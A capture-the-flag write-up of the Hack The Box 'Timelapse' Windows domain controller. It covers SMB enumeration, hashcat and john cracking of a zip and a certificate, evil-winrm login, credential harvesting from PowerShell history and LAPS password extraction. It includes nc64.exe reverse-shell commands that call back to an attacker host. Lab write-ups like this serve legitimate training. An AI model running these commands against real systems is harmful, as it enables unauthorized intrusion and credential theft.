Timelapse - Hack The Box
Timelapse is an easy-rated Windows machine from Hack The Box. The box is quiet realistic where you work your way to the initial foothold starting with some locked files on a open share. I struggled a bit on what to do with found certificates, but once figured out it was smooth sailing to Administrator. This wasn’t the most enjoyable box I’ve done, neither was it particularly bad.
USER
Step 1
nmap:
➜ timelapse nmap -Pn -n -p- 10.10.11.152 --open -v
[... snip ...]
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
51418/tcp open unknown
➜ timelapse nmap -Pn -n -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49696,51418 -sCV 10.10.11.152
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-31 15:20:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-03-31T15:21:54+00:00; +8h02m39s from scanner time.
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
51418/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
➜ timelapse sudo nmap -sU -p- --open 10.10.11.152 -v
[... snip ...]
PORT STATE SERVICE
53/udp open domain
dirb:
N/A
nikto:
N/A
ffuf:
N/A
smbclient:
➜ timelapse smbclient -L 10.10.11.152
Enter WORKGROUP\void's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
rpcclient:
➜ timelapse rpcclient -U "" dc01.timelapse.htb
Enter WORKGROUP\'s password:
rpcclient $>
dc01.timelapse.htb
from nmap
Step 2
First thing we find is a globally open SMB share, enumerate it.
➜ timelapse smbclient \\\\10.10.11.152\\Shares
Enter WORKGROUP\voids password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
\Dev
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
\HelpDesk
. D 0 Mon Oct 25 17:48:42 2021
.. D 0 Mon Oct 25 17:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 16:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 16:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 16:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 16:57:44 2021
smb: \> prompt off
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (23.0 KiloBytes/sec) (average 23.0 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (3627.9 KiloBytes/sec) (average 2656.7 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (886.7 KiloBytes/sec) (average 2270.4 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (963.6 KiloBytes/sec) (average 1548.7 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (507.0 KiloBytes/sec) (average 1438.0 KiloBytes/sec)
Before going through the LAPS files, we can try to brute force the zip. Remember to beautify the hash file so that it starts and ends with $pkzip2$
.
➜ Dev unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect password
➜ Dev /usr/sbin/zip2john winrm_backup.zip > zip.hash
➜ Dev vim zip.hash
➜ Dev hashcat -a0 -m17210 zip.hash /usr/share/wordlists/rockyou.txt
[... snip ...]
$pkzip2$1*2*2*0*965* [... snip ...] *$/pkzip2$:supremelegacy
Session..........: hashcat
Status...........: Cracked
➜ Dev unzip -P supremelegacy winrm_backup.zip
Archive: winrm_backup.zip
inflating: legacyy_dev_auth.pfx
Step 3
Try to crack the certificate (.pfx
) password.
➜ Dev /usr/share/john/pfx2john.py legacyy_dev_auth.pfx | john --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin
[... snip ...]
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:06 DONE (2022-03-31 12:18) 0.01499g/s 48458p/s 48458c/s 48458C/s thuglife06..thug211
Testing the new password against LDAP, SMB and WinRM we find our first set of working creds, over LDAP legacy:thuglegacy
.
➜ timelapse crackmapexec ldap 10.10.11.152 -u legacy -p thuglegacy
LDAP 10.10.11.152 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\legacy:thuglegacy
➜ timelapse crackmapexec smb 10.10.11.152 -u legacy -p thuglegacy
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\legacy:thuglegacy STATUS_ACCESS_DENIED
➜ timelapse crackmapexec winrm 10.10.11.152 -u legacy -p thuglegacy
WINRM 10.10.11.152 5986 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:timelapse.htb)
WINRM 10.10.11.152 5986 DC01 [*] https://10.10.11.152:5986/wsman
WINRM 10.10.11.152 5986 DC01 [-] timelapse.htb\legacy:thuglegacy "HTTPConnectionPool(host='10.10.11.152', port=5985): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f4a3de153a0>, 'Connection to 10.10.11.152 timed out. (connect timeout=30)'))"
However, testing the ldap credentials against everything and anything results in errors.. so lets go back to the .pfx
file.
Reading about the .pfx
we should be able to extract a .key
and .crt
file, which we can later use for evil-winrm login.
➜ Dev openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key
Enter Import Password: thuglegacy
Enter PEM pass phrase: thuglegacy
Verifying - Enter PEM pass phrase: thuglegacy
➜ Dev openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx.crt
Enter Import Password: thuglegacy
➜ Dev evil-winrm -i 10.10.11.152 -c pfx.crt -k priv.key -p -u -S
Enter PEM pass phrase: thuglegacy
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
98f42c5d696089eac85401c445d1e2f9
ROOT
Step 1
With manual information we see that the privileges are low and no interesting groups.
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development Group S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
We find three new users, Administrator
, svc_deploy
and TRX
.
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
Step 2
From the SMB share we found some LAPS documentation, so the privesc probably have something to do with this.
Microsoft’s LAPS is a client side extension which runs a single dll that manages password (AdmPwd.dll
).
The dll is present in C:\Program Files\LAPS\CSE\AdmPwd.dll
, download it.
*Evil-WinRM* PS C:\Program Files\LAPS\CSE> download "C:\Program Files\LAPS\CSE\AdmPwd.dll"
However we are a low privileged user so we can’t poison the dll.. For a quick win check the history and we find a new set of creds: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
And also got code execution as user svc_deploy
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
Replicate to get a new reverse shell.
*Evil-WinRM* PS C:\Users\legacyy\Documents> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy\Documents> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy\Documents> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
➜ /opt impacket-smbserver share . -smb2support
*Evil-WinRM* PS C:\Users\legacyy\Documents> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {//10.10.14.2/share/nc64.exe 10.10.14.2 4488 -e powershell}
➜ timelapse rlwrap nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.152] 52197
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
Step 3
Enumerating the directories we find laps.ps1
PS C:\Users\svc_deploy\Desktop> type laps.ps1
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$computers | Export-Csv -path c:\users\danny\desktop\"LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation
Run the script:
PS C:\Users\svc_deploy\Desktop> ./laps.ps1
Name DnsHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
---- ----------- ------------- ---------------------------
WEB01
DEV01
DB01
DC01 dc01.timelapse.htb 6+e(2G,L;TK5+eGy%gJ8s.2X 132936070633235489
A new set of creds: Administrator:6+e(2G,L;TK5+eGy%gJ8s.2X
PS C:\Users\svc_deploy\Desktop> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
PS C:\Users\svc_deploy\Desktop> $p = ConvertTo-SecureString '6+e(2G,L;TK5+eGy%gJ8s.2X' -AsPlainText -Force
PS C:\Users\svc_deploy\Desktop> $c = New-Object System.Management.Automation.PSCredential ('Administrator', $p)
PS C:\Users\svc_deploy\Desktop> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\administrator
PS C:\Users\svc_deploy\Desktop> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {//10.10.14.2/share/nc64.exe 10.10.14.2 4499 -e powershell}
➜ timelapse rlwrap nc -lvnp 4499
listening on [any] 4499 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.152] 64806
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator\Documents> whoami
timelapse\administrator
Step 4
The flag, root.txt
, is not in it’s normal directory (C:\Users\Administrator\Desktop\root.txt
).
Looking around we find the flag in user TRX
directory.
PS C:\Users\TRX\Desktop> type root.txt
5f0405eed578c041a6f9ad86d0318e82
References
.pfx to .key & .crt: https://medium.com/beingcoders/easy-way-to-convert-pfx-to-crt-key-files-in-10-minutes-683849242c65